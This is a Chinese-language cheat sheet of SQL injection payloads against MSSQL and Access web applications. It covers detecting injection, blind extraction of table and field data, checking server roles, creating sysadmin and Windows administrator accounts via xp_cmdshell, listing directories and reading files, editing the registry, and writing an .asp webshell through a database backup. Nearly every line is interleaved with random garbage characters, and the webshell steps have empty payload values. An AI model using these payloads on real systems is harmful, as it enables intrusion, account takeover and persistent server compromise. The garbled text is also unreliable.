1.判断是否有注入;and 1=1 ;and 1=2 H?^#zj`Ex+
2.初步判断是否是mssql ;and user>0 �XFe7qt;%�
��[�1ME�A;
3.注入参数是字符'and [查询条件] and ''=' YU,:3��{9,
*�c
c+�Fd
4.搜索时没过滤参数的'and [查询条件] and '%25'=' YY�h_lAS>�
Czxrn�2p�/
5.判断数据库系统 ���cY]Y8T)
<�~�*Ol+/�
;and (select count(*) from sysobjects)>0 mssql j7�+t@Dq�Q
k�w}1��CXD
;and (select count(*) from msysobjects)>0 access �4^�^rOi�0
u\�?��u�4
eV�%bJkt.�
Y6PA��\7Y\
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �g�hj��~r�
�\�8aF(Y^H
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 E-�iB�A�(H
x7��@H�Pf�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ?zu{&aOX|
�qE:DJy��<
9.(1)猜字段的ascii值(access) a$O]'}]�`�
�"A+F�&C>�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Y@Y�(;C"SW
�4T�E ?mh}
(2)猜字段的ascii值(mssql) 9r#{s��� Y
_?c.�3+�;s
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 r�2'rf��pQ
"-:\�-sMt{
10.测试权限结构(mssql) 9X` QlJ2|�
p00�A�cUTq
T+D]bfjr&&
��<��~�+��
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Z$XpoDbOy�
LS$�82UB�&
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- L:Eb�(�z/D
P�tOn�j)Q�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- y��bO�,~TQ
�.Y.#
d7TA
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Z?mg1��;�Q
�;�BVhkW�A
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- p2�(_YN;s
LT�c�t0�Gh
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- -"H4b�rj;G
� O+j��:L�
;and 1=(select IS_MEMBER('db_owner'));-- eR`<9�KB�H
N|S xA�g�
`ay�c��YoD
V�C7F#a*V�
11.添加mssql和系统的帐户 ��!��
fc)�
V5�r��7�eC
;exec master.dbo.sp_addlogin username;-- i`'^ zR(`i
;exec master.dbo.sp_password null,username,password;-- ��H-w|JH>g
vD�v�GT�<d
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ^W�'[l al.
o |�iLBh$)
;exec master.dbo.xp_cmdshell 'net user username password hspg�-|�R
�Am �
�$�L
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �e�MzC��AO
-�5.%{Go$[
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ����v2sU$M
�a6��P.Zf7
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �R��?s\�0�
�qKC*j��DW
Nk�I:����
,[���L$���
12.(1)遍历目录 ��1���}�*;
%�m�3e�faC
;create table dirs(paths varchar(100), id int) �p>�S/6 [X
"�|SE�#�k�
;insert dirs exec master.dbo.xp_dirtree 'c:\' ����Z+(V \
��xltu
g##
;and (select top 1 paths from dirs)>0 F�G:BRS<m~
$uh�DB�mb�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) zK?[����dO
�eS�:e#>�(
"cM5=����;
^mQf�Xf�uL
(2)遍历目录 I_�7EfAqg(
�It-*�CD9
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �q2vz�#\A?
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 fM.|��#eLi
A!yLwk�c:5
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �s�#ZH.z@J
IO�l�"Xgn5
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 7gcG�|�kKT
'O9=*L�)�X
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 @x�
+#ZD�(
/
u6$M/Cf>
;�bE6Y]"Rz
B$EP'�5@b
13.mssql中的存储过程 cU|jT8Q4H
=U2n"du���
xp_regenumvalues 注册表根键, 子键 *�pp1W�a7O
^^uD33�@_�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ��+9CU�nRv
k��1z�t|��
xp_regread 根键,子键,键值名 ]5/U��}�Um
�GJP��Z[bo
;exec xp_regread ts>}�>}@vc
ulJ�YJ+CC!
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �e�]h�'�
=]"|x�7'!�
xp_regwrite 根键,子键, 值名, 值类型, 值 ��ifZ�Nl�,
Y�p��j)6d�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ,$$$_�+�m\
oW6<7>1M7
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 !H\GHA'DO]
.+��h
pxZ�
xp_regdeletevalue 根键,子键,值名 �[z�E��P�|
.
*xq� =
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ped� Yf{�T
HYmX�Pps�e
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 hATy�3�*�4
|LH*)GrD*t
k|�'�Mh0G0
����caD;V(
14.mssql的backup创建webshell ��p��UG�fm
P@��`�"MNS
use model *?�E��f}:]
N)W�G~=Gi�
create table cmd(str image); X(28��xbd|
;NeEgqW�"�
insert into cmd(str) values (''); 1G.gP�x[�
��?ovGYzUZ
backup database model to disk='c:\l.asp'; 1:U�C�\�WW
ZY$@_D�OB}
*Bsmn!_cB{
BK� SK@O�V
15.mssql内置函数 f�`=�T�@nA
�^VPl�>jTg
;and (select @@version)>0 获得Windows的版本号 �dv�F48,kr
n ]}2O�4j
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ?<^AXLiKV�
?�I�#�hrv@
;and (select user_name())>0 爆当前系统的连接用户 q�|l��|�mO
UyK�G$6F?3
;and (select db_name())>0 得到当前连接的数据库 ����j)6B^!
[:@�?,?V\N
?�u!AH�Sr(
%v:���h]TA
16.简洁的webshell �K/��m)f#
u@u.N2H�.%
use model )u�u�EOF"w
chzR4"WZFt
create table cmd(str image); D�-:<�]D:�
0.+eF }'H�
insert into cmd(str) values (''); ��5THS5'��
B/kn&^z$|~
backup database model to disk='g:\wwwtest\l.asp';
